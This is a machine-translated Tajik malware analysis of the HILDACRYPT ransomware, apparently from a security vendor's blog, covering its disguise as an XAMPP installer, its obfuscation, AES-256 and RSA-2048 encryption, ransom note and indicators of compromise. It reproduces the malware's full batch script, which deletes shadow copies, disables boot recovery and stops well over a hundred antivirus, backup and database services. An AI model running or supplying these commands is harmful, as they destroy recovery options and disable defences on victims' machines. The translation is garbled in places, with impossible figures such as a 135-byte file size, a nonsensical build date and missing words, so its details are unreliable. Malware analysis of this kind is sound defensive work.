Салом, Хабр! Бори дигар, мо дар бораи версияҳои охирини нармафзори зараровар аз категорияи Ransomware сухан меронем. HILDACRYPT як нармафзори нави фидиявӣ мебошад, ки узви оилаи Ҳилда моҳи августи соли 2019 кашф шудааст ва ба номи мультфильми Netflix, ки барои паҳн кардани нармафзор истифода шудааст, номгузорӣ шудааст. Имрӯз мо бо хусусиятҳои техникии ин вируси ransomware навшуда шинос мешавем.
Дар версияи якуми ransomware Hilda, истинод ба яке дар Youtube нашр шудааст силсилаи мультфильм дар мактуби фидя мавҷуд буд. HILDACRYPT ҳамчун насбкунандаи қонунии XAMPP, дистрибюсияи ба осонӣ насбшавандаи Apache, ки MariaDB, PHP ва Perl-ро дар бар мегирад, маскан мегирад. Дар айни замон, криптлокер номи файли дигар дорад - xamp. Илова бар ин, файли ransomware имзои электронӣ надорад.
Таҳлили статикӣ
Барномаи ransomware дар файли PE32 .NET мавҷуд аст, ки барои MS Windows навишта шудааст. Андозаи он 135 байт аст. Ҳам коди асосии барнома ва ҳам рамзи барномаи муҳофизаткунанда дар C# навишта шудаанд. Тибқи санаи тартибдиҳӣ ва мӯҳри вақт, бинарӣ 168 сентябри соли 14 сохта шудааст.
Тибқи Detect It Easy, нармафзори ransomware бо истифода аз Confuser ва ConfuserEx бойгонӣ карда мешавад, аммо ин обфускаторҳо ҳамон тавре ки қаблан ҳастанд, танҳо ConfuserEx вориси Confuser аст, аз ин рӯ имзоҳои коди онҳо шабоҳат доранд.
HILDACRYPT воқеан бо ConfuserEx бастабандӣ шудааст.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Вектори ҳамла
Эҳтимол, нармафзори ransomware дар яке аз сайтҳои барномасозии веб кашф шудааст, ки ҳамчун як барномаи қонунии XAMPP маскан гирифта шудааст.
Тамоми занҷири сироятро дар он дидан мумкин аст .
Мушкилот
Сатрҳои ransomware дар шакли рамзгузорӣ нигоҳ дошта мешаванд. Ҳангоми оғозёбӣ, HILDACRYPT онҳоро бо истифода аз Base64 ва AES-256-CBC рамзкушо мекунад.
параметр
Пеш аз ҳама, ransomware дар %AppDataRoaming% папкаеро эҷод мекунад, ки дар он параметри GUID (Идентификатори Globally Unique) ба таври тасодуфӣ тавлид мешавад. Бо илова кардани файли bat ба ин макон, вируси ransomware онро бо истифода аз cmd.exe оғоз мекунад:
cmd.exe /c JKfgkgj3hjgfhjka.bat ва баромадан
Он гоҳ он ба иҷрои скрипти партия барои хомӯш кардани хусусиятҳо ё хидматҳои система оғоз мекунад.
Скрипт рӯйхати дарози фармонҳоро дар бар мегирад, ки нусхаҳои сояро нест мекунанд, сервери SQL, нусхабардорӣ ва ҳалли антивирусро хомӯш мекунанд.
Масалан, он кӯшиш мекунад, ки хидматҳои Acronis Backup-ро қатъ кунад. Илова бар ин, он ба системаҳои эҳтиётӣ ва ҳалли антивирусҳо аз фурӯшандагони зерин ҳамла мекунад: Veeam, Sophos, Kaspersky, McAfee ва дигарон.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Вақте ки хидматҳо ва равандҳои дар боло зикршуда хомӯш карда мешаванд, криптлокер маълумотро дар бораи ҳамаи равандҳои иҷрошаванда бо истифода аз фармони рӯйхати вазифаҳо ҷамъоварӣ мекунад, то боварӣ ҳосил кунад, ки ҳамаи хидматҳои зарурӣ қатъ карда мешаванд.
рӯйхати вазифаҳо v/fo csv
Ин фармон рӯйхати муфассали равандҳои иҷрошавандаро нишон медиҳад, ки унсурҳои онҳо бо аломати "," ҷудо карда шудаанд.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Пас аз ин санҷиш, нармафзори ransomware раванди рамзгузориро оғоз мекунад.
Рамзгузорӣ
Рамзгузории файл
HILDACRYPT аз тамоми мундариҷаҳои ёфтшудаи дискҳои сахт мегузарад, ба истиснои ҷузвдонҳои Recycle.Bin ва Reference AssembliesMicrosoft. Охирин дорои файлҳои муҳими dll, pdb ва ғайра барои замимаҳои .Net мебошад, ки метавонанд ба кори нармафзори ransomware таъсир расонанд. Барои ҷустуҷӯи файлҳое, ки рамзгузорӣ мешаванд, рӯйхати зерини васеъшавӣ истифода мешавад:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Барномаи ransomware алгоритми AES-256-CBC-ро барои рамзгузории файлҳои корбар истифода мебарад. Андозаи калид 256 бит ва андозаи вектори оғозёбӣ (IV) 16 байт аст.
Дар скриншоти зерин, арзишҳои byte_2 ва byte_1 ба таври тасодуфӣ бо истифода аз GetBytes () гирифта шуданд.
Калидвожа
ВИ
Файли рамзгузоришуда дорои тамдиди HCY!.. Ин як мисоли файли рамзгузоришуда аст. Калид ва IV дар боло зикршуда барои ин файл сохта шудаанд.
Рамзгузории калид
Криптлокер калиди тавлидшудаи AES-ро дар файли рамзшуда нигоҳ медорад. Қисми якуми файли рамзгузоришуда дорои сарлавҳаест, ки дорои маълумот ба монанди HILDACRYPT, KEY, IV, FileLen дар формати XML буда, чунин менамояд:
Рамзгузории калидҳои AES ва IV бо истифода аз RSA-2048 ва рамзгузорӣ бо истифода аз Base64 анҷом дода мешавад. Калиди ҷамъиятии RSA дар бадани криптлокер дар яке аз сатрҳои рамзгузоришуда дар формати XML нигоҳ дошта мешавад.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Калиди оммавии RSA барои рамзгузории калиди файли AES истифода мешавад. Калиди ҷамъиятии RSA Base64 рамзгузорӣ шудааст ва аз модул ва экспоненти оммавии 65537 иборат аст. Рамзро барои рамзкушоӣ калиди хусусии RSA, ки ҳамлакунанда дорад, талаб мекунад.
Пас аз рамзгузории RSA, калиди AES бо истифода аз Base64, ки дар файли рамзгузоришуда нигоҳ дошта шудааст, рамзгузорӣ карда мешавад.
Паёми фидя
Пас аз ба итмом расидани рамзгузорӣ, HILDACRYPT файли html-ро ба ҷузвдоне, ки дар он файлҳоро рамзгузорӣ кардааст, менависад. Огоҳиномаи ransomware дорои ду суроғаи почтаи электронӣ мебошад, ки ҷабрдида метавонад бо ҳамлагар тамос гирад.
Эъломияи тамаъҷӯӣ инчунин дорои сатри "Не лоли бехатар нест;)" - ишора ба қаҳрамонҳои аниме ва манга бо намуди зоҳирии духтарони хурдсол дар Ҷопон мамнӯъ аст.
хулоса
HILDACRYPT, як оилаи нави ransomware, версияи навро баровард. Модели рамзгузорӣ ҷабрдидаро аз рамзкушоӣ кардани файлҳои аз ҷониби ransomware рамзкунонидашуда пешгирӣ мекунад. Cryptolocker усулҳои фаъоли муҳофизатро барои хомӯш кардани хидматҳои муҳофизати марбут ба системаҳои эҳтиётӣ ва ҳалли антивирус истифода мебарад. Муаллифи HILDACRYPT як мухлиси силсилаи аниматсионии Ҳилда дар Netflix мебошад, ки истиноди трейлери он дар номаи хариди версияи қаблии барнома мавҷуд аст.
Одатан, и метавонад компютери шуморо аз ransomware HILDACRYPT муҳофизат кунад ва провайдерҳо имкон доранд, ки муштариёни худро бо . Муҳофизат аз он иборат аст, ки ин қарорҳо дар бар мегиранд на танҳо нусхаи эҳтиётӣ, балки системаи ҳамгирошудаи амнияти моро низ дар бар мегирад - Бо модели омӯзиши мошинсозӣ ва ба эвристикаи рафторӣ асос ёфтааст, технологияе, ки қодир аст ба таҳдиди нармафзори фидияи сифрӣ муқобилат кунад, мисли ҳеҷ каси дигар.
Нишондиҳандаҳои созиш
Васеъкунии файл HCY!
HILDACRYPTReadMe.html
xamp.exe бо як ҳарфи "p" ва бидуни имзои рақамӣ
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Манбаъ: will.com